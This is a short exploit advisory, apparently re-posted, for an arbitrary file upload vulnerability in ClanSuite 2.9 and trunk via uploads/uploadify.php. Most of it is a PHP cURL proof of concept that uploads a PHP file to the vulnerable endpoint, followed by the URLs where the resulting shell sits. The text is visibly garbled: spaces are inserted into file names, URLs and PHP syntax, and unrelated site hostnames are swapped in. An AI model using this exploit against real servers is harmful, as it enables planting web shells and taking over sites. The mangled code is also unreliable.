Title: ClanSuite 2.9 Arbitrary File Upload
Discoverer: Adrien Thierry
Program developer http://clansuite.com/
: Https://github.com/jakoch/Clansuite http://svn.gna.org/svn/clansuite/trunk/
Affected Versions: 2.9 and Trunk Revision 6400
Defect address: uploads/uploadify. php
Test Method
<? Php
$ U = "C: \ Program Files (x86) \ EasyPHP-5.3.9 \ www \ info. php ";
$ C = curl_init ("http: // www.2cto.com/uploads/uploadify. php"); // Version 2.9
$ C = curl_init ("http: // www.2cto.com/application/uploads/uploadify. php"); // Version trunk
Curl_setopt ($ c, CURLOPT_POST, true );
Curl_setopt ($ c, CURLOPT_POSTFIELDS,
Array ('filedata' => "@ $ u ",
'Name' => "info. php "));
Curl_setopt ($ c, CURLOPT_RETURNTRANSFER, 1 );
$ E = curl_exec ($ c );
Curl_close ($ c );
Echo $ e;
?>
Shell location:
Http://www.bkjia.com/uploads/temps/info. php
Or http://www.bkjia.com/application/uploads/temps/info. php